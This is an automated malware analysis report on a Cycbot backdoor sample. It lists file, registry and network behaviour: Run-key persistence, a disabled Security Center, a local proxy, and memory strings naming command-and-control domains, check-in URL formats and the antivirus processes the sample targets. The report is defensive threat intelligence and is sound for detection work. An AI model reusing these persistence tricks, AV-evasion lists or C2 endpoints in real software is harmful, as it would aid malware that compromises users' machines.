Backdoor.Win32.Cycbot_b14eff4be8

by malwarelabrobot on September 9th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b14eff4be874c4ee4e64e4ce982c6944
SHA1: d87881e8fc5a6b44d7d1d80db6f60c7fa0a6b8a4
SHA256: 32812199dca132ce12ec1e307b45416ed6428c2b43f61ec566fcd9e11af5b103
SSDeep: 6144:qjvlUvuok4UkF2DiceFjvcUGFWRTJ1Di88tj TSyyXides:YmvuF9QFuWRTJdl8UTByXide
Size: 285696 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-09-26 08:39:44
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

dwwin.exe:2536
%original file name%.exe:2896
%original file name%.exe:1952

The Backdoor injects its code into the following process(es):

7.tmp:2448
%original file name%.exe:348

Mutexes

The following mutexes were created/opened:

WininetProxyRegistryMutex
WininetStartupMutex
WininetConnectionMutex
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!local settings!history!history.ie5!
_!MSFTHISTORY!_
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ShimCacheMutex
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B1D429DE-B782-4253-84AD-6E09A8438AD5}
RasPbFile

File activity

The process 7.tmp:2448 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\d9bd_appcompat.txt (1775 bytes)

The process dwwin.exe:2536 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4D0F8.dmp (76112 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\config\software (838 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (1390 bytes)
%Program Files%\LP\DFB5\7.tmp (12588 bytes)
%Program Files%\LP\DFB5\C29.exe (274098 bytes)
%System%\config\SOFTWARE.LOG (1987 bytes)

Registry activity

The process 7.tmp:2448 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 EF 3B 28 9E 10 29 68 57 05 F4 57 0A 69 95 8F"

The Backdoor deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Backdoor deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process dwwin.exe:2536 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:57333"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 3F 7E 32 D4 0E 3B 56 89 8D 28 F0 F1 6D 44 0C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:2896 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D DA BC 0B FD 8E BE 71 11 B3 DF DC E2 F4 90 B6"

The process %original file name%.exe:348 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:57333"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 AC 46 A6 F4 3B 43 AE 1C A1 FE E1 33 CD F1 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\DFB5\C29.exe"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:1952 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 91 71 4C 68 38 66 D6 57 EF B2 24 36 4B D6 49"

Dropped PE files

MD5 File path
4c5c0b335ff2651654c8277befef4ee7 c:\Program Files\LP\DFB5\7.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 282239 139264 5.20431 d093554e8746a5513351d98a74c8d8bf
.rdata 286720 1160 1536 3.26418 eed872b6511c300dfabedd7ea8dc0b75
.data 290816 143054 143360 5.51042 6f21217a75f90aa4a28a5fd06a288f30
.rsrc 434176 4096 512 0.616836 80b8ae225003ee48a599f60810f72540

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://highspeedinternetlosangeles.webnode.com/news/2.php?sv=671&tq=gHZutDyMv5rJeTbia9nrmsl6giWz+JZbVyA= 217.11.242.82
hxxp://crl.verisign.com/pca3.crl 23.43.133.163
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.43.133.163
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 212.30.134.183
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 212.30.134.183
hxxp://crl.verisign.com/pca3-g2.crl 23.43.133.163
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.43.133.163
au739gqx.blogercontent.com 50.116.35.251


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin

Traffic

GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "70058b8eba03c9345098899a22ee1929:1441660529"
Last-Modified: Mon, 07 Sep 2015 21:15:29 GMT
Date: Tue, 08 Sep 2015 09:02:35 GMT
Content-Length: 2249
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.150907210002Z..150921210002Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\[email protected]`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 20 Aug 2015 18:11:19 GMT
Accept-Ranges: bytes
ETag: "803dac9c73dbd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Tue, 08 Sep 2015 09:02:30 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401D0DB739CEE64E9....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Thu, 20 Aug 2015 19:08:01 GMT
Accept-Ranges: bytes
ETag: "803e6c887bdbd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 50006
Date: Tue, 08 Sep 2015 09:02:30 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
MSCF....V.......,...................I..................G.` .authroot.s
tl.W....8..CK...<T.....c.5(..=..!Ev"..d'..c-iTBWI.H%..V.........E.%
)...f....uo...~/.3..s..y>...=..l...dbUH4M...1....&J.}<...#.L..\.
x!F.t.^......q..l8p.i.J'3.........J.5v....z-...A4U.T.E...h...}$.....5.
=.....VnU..E.[.[a(.."..G..P..k.m.3.....EP>.g..?.kY|..L.v...qDz...T.
&p.&..:.f....T.b..\...Af\..J..I.....tN09.......|,[r._..x..Y.e.(d..o...
`3........(... .$...V..e.y.s$p...u...........W..~...A.B....GoOV.....JT
.."VF.<.A....3...r.......addf`.....ph.J:r.E..[\L.X.:....?.. .....b.
..l....St...U.N;..a.h-W....4.Uqb.MbF=.X.C..DX..............V.U..P.....
'[email protected]:...5..j7[.!Yb|.....l...G.
F.E..?lg..m-n.(/6I..........._......5........n.t.<.'....Nim..;.!{..
......N.h...u.....x`... gR..B..V{.'..=}..=|.hg.9.6....j..w.[P`.G.....d
..............!..t./..........*.@(8(v1....'..Z. ....R.r....1Jn.j.[p..A
t..W;F.(..a...N...X....=.[..'.r.....^$B.a...9....,v-...%.2...:...[..6.
j...1..!{.....n..={.U....%...y,.....>a`..0..6..SJda.)9x...zqc..X..V
q.1z.....'^.....^sU|$.u...~.Lgf...Y...V..(f.(...m...-..-&,..c&z...-...
..fGO..6...N.y<.z..,...g|.....!..$....<....q......q8.<t.k.p.=
......z.}.Q.U....&J..-T......[...........}u...T.......>.y.e..CF".VX
$;&T.>..].3.H....7k..w.m...(..#[email protected]....[..l..w.e.2..3..(y. ...
|K9>...o..Uz.....V..W|.k.|...,..V.xPmV...X......!.........Jj.%.N_.9
T.~...v...C.!.4.5a.!...(..../[email protected]....
......D~...%y.....i....a.$vu.7...{.6.{Y3....5.YD.d>,.....b...H.
<<< skipped >>>


GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "ec6061ccec64788382ed311de68b9334:1441660528"
Last-Modified: Mon, 07 Sep 2015 21:15:28 GMT
Date: Tue, 08 Sep 2015 09:02:31 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0...0......0...*.H........0..1.0...U....US1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at htt
ps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signin
g 2009-2 CA..150907210002Z..150921210002Z0...0!.....V..t..'.F(z....121
202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100
722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100
930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091
029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100
514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091
[email protected]!.........}..Dt...!..090
922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100
523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100
413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090
608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100
219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..
100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..
100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..&l
t;K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^....
......091203194409Z0!....B....d...*[email protected]!.......m. .V..
...~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:
......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,
s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>


GET /news/2.php?sv=671&tq=gHZutDyMv5rJeTbia9nrmsl6giWz+JZbVyA= HTTP/1.0
Connection: close
Host: highspeedinternetlosangeles.webnode.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.0 404 Not Found
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
Content-Length: 25596
Connection: close
<!doctype html>.<!--[if lt IE 7]> <html class="lt-ie10 
lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->.<!--[if IE 7
]>    <html class="lt-ie10 lt-ie9 lt-ie8" lang="en"> <![en
dif]-->.<!--[if IE 8]>    <html class="lt-ie10 lt-ie9" lan
g="en"> <![endif]-->.<!--[if IE 9]>    <html class="
lt-ie10" lang="en"> <![endif]-->.<!--[if gt IE 9]><!
-->.<html lang="en">.<!--<![endif]-->..<head>.
    <meta charset="utf-8">.    <meta http-equiv="X-UA-Compati
ble" content="IE=edge,chrome=1">.    <meta name="robots" content
="noindex, nofollow" />.    <meta name="googlebot" content="noin
dex, nofollow" />.    <title>Webnode Error Page</title>
.    <meta name="viewport" content="width=device-width, initial-sca
le=1.0">.    <link rel="stylesheet" href="hXXp://static-cdn1.web
node.com/css/404/style.css">.    <link href="hXXp://fonts.google
apis.com/css?family=Open Sans:400,400italic,700,700italic|Open Sans Co
ndensed:300,300italic,700&subset=latin,latin-ext" rel="stylesheet" typ
e="text/css">.</head>.......<script type="text/javascript"
>./* <![CDATA[ */....var defaultLanguage = 'en';..var languageDe
tectedInRequest = 'en';..var language = defaultLanguage;..if (language
DetectedInRequest == null) //Browser will try to detect language. If i
t fails, defaultLanguage will be used...{..    language = window.navig
ator.userLanguage || window.navigator.browserLanguage || window.na
<<< skipped >>>


GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "7f8e894eb4f319ed13d4fb506eb98ea2:1435261514"
Last-Modified: Thu, 25 Jun 2015 19:45:14 GMT
Date: Tue, 08 Sep 2015 09:02:31 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..150617000000Z..150
930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............I`Kec4...D'k.3j._...A1.
........U...=.G......8..4...[....qAq.....m.E..;r.Ju7.................j
..-5...".d>.x4g../r...G.E.g..I.H...HTTP/1.1 200 OK..Server: Apache.
.ETag: "7f8e894eb4f319ed13d4fb506eb98ea2:1435261514"..Last-Modified: T
hu, 25 Jun 2015 19:45:14 GMT..Date: Tue, 08 Sep 2015 09:02:31 GMT..Con
tent-Length: 933..Connection: keep-alive..Content-Type: application/pk
ix-crl..0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc
.1705..U....Class 3 Public Primary Certification Authority..1506170000
00Z..150930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A..
...{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y
..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!.
<<< skipped >>>

GET /pca3-g2.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "a12004ee62778080776f627e8e9b5b79:1435263013"
Last-Modified: Thu, 25 Jun 2015 20:10:13 GMT
Date: Tue, 08 Sep 2015 09:02:34 GMT
Content-Length: 1415
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..150617000000Z..150930235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
 F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
[email protected]!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H..............(....H0..Ku.f..9S..5l.5(.....
...u.H. .......Q.r../.}G...`a.M..a........V.t.M..j..J...g:....U..-..Z9
.....[W3..........%Y.I.w._...
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

%original file name%.exe_348:

`.rsrc
].mW$
u.Vh|
SSShkU@
SSSh 
SSj%S
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://xprstats.com/k1.php
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
TMFLDMN%d
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=116
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
firoli-sys.com
hoststorageforyou.com
wwwmediahosts.com
blogercontent.com
halinoiser.com
allforyourimage.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?sv=%d&tq=%s
%s:%d/%s?sv=%d&tq=%s
hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg
hXXp://binghamtonschools.org/images/297893.jpg
hXXp://binghamtonschools.org/images/297894.jpg
hXXp://alleducationalsoftware.com/creditcardlogos.gif
